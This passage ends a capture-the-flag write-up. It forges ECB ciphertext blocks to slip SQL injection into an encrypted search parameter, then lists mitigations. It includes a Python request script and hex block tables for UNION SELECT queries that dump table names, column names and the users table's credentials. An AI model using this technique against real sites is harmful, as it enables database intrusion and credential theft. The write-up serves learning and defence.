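import requests

blocks = [
    "1be8251117ba5bfd578c0eef466db59c",  # SELECT * FROM JO
    "dc84728fd2f89d93751d10a7c75c8cf2",  # KES WHERE JOKE L
    "c0872dee8b390b1156913b08a223a39e",  # IKE '%aaaaaaaaaa
    "36c550994e94298f5a065ac38ea9cbd7",  # ' UNION SELECT
    "9fb2c82683985bd21224f4a1dd70507e",  # 1;#
    "75fd5044fd063626f6bb7f734b41c899",  # <16 byte pad>
]
ciphertext = b"".join(bytes.fromhex(b) for b in blocks)
payload = quote(base64.b64encode(ciphertext).decode(), safe="")
print(requests.get("http://site.name/search.php?query=" + payload).text)

Note safe="" so that the plus signs, slashes and equals signs in the base64 output are percent-encoded as well.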

Let’s proceed:

SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e'
' UNION SELECT   -- b'36c550994e94298f5a065ac38ea9cbd7'
table_name FROM  -- b'49628aa9ea9f5f088b720ba991d91dc5'
information_sche -- b'0329a1abfe5c16ae68ce04abf9a935c8'
ma.tables;#      -- b'3f74e043974e647b303b0c3e1cec6604'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

Bingo!
We get the entire list of table names. Two stand out: ‘jokes’ and ‘users’.

Let’s skip the jokes prefix too (and fix the error I got when my query result no longer contained a joke column):

SELECT column_na -- b'0bb623e8185083eb808d997e9dc9edc4'
me as joke from  -- b'8e934d7e5200d5d5cda7344f3f9b7f3c'
informat         -- b'eb8b19c46430e317918ce1727a6350e1'
ion_schema.colum -- b'ab1cb043f4546efcc1d8f97b217bcf2d'
ns where table_n -- b'44bd82dfac975e1d5f5c1aa784985be2'
ame LIKE         -- b'7427adc2fafca6f328e5845b4c75d912'
'users%%%%%%%%%% -- b'cc221115d011307f2515496e360fa96b'
';#              -- b'0018ad0c0200bda82423885bea3701fa'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

We get:
username
password

Finally:

select username  -- b'2e935761dedf092525f2259d8444df3e'
as joke from use -- b'13b7a41e291aafeff2ebb88c17fd1c5a'
rs union select  -- b'ebd89e1563dc499ce3140dc21567240d'
password from us -- b'8c11f169f048c2b9ef2739011035e2b0'
ers;#            -- b'4cf81cbe37c5a5fac50c72e64c37fd8b'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

(Screenshot: the final query returns the usernames and passwords.)

And we have completed the objective of the challenge: the username is “root@kali” and the secret password is “that is not how you specify the port”.


$> CONCLUSIONS

If you’ve read this far you’ve probably concluded that the challenge was not very realistic and that the vulnerability could’ve been mitigated or prevented in multiple ways:

  • Using different databases for login data and other, non-critical data
  • Crafting the final SQL query closer to the database, making it difficult to bypass mysqli_real_escape_string
  • Avoiding printing detailed error messages to the end user
  • Using a modern mode of encryption (CBC) instead of deprecated ECB
  • Not giving the end user direct access to the ciphertext

(Arguably there is little need for the extra encryption and data forwarding layer here at all, but let us assume that it is an unavoidable Business Requirement from upper management).

But all of that is beside the point! We explored, tried things, learned things and persisted until we found something that worked. Realistic scenario or not, that’s the workflow which yields results. And we had a lot of fun along the way, didn’t we?

If you think you might be interested in trying out some wargaming, here’s a good collection of sites to start from:
https://www.wechall.net/active_sites
Everyone has their own preferences, so pick your poison and dive right in. If you don’t like a certain site, try another. If you’re very new, expect to be struggling a lot at the start – but there’s no need to rush, and indeed, you shouldn’t.

That’s all from me – hope you enjoyed the read and/or learned something!

Hugs,
Chrys

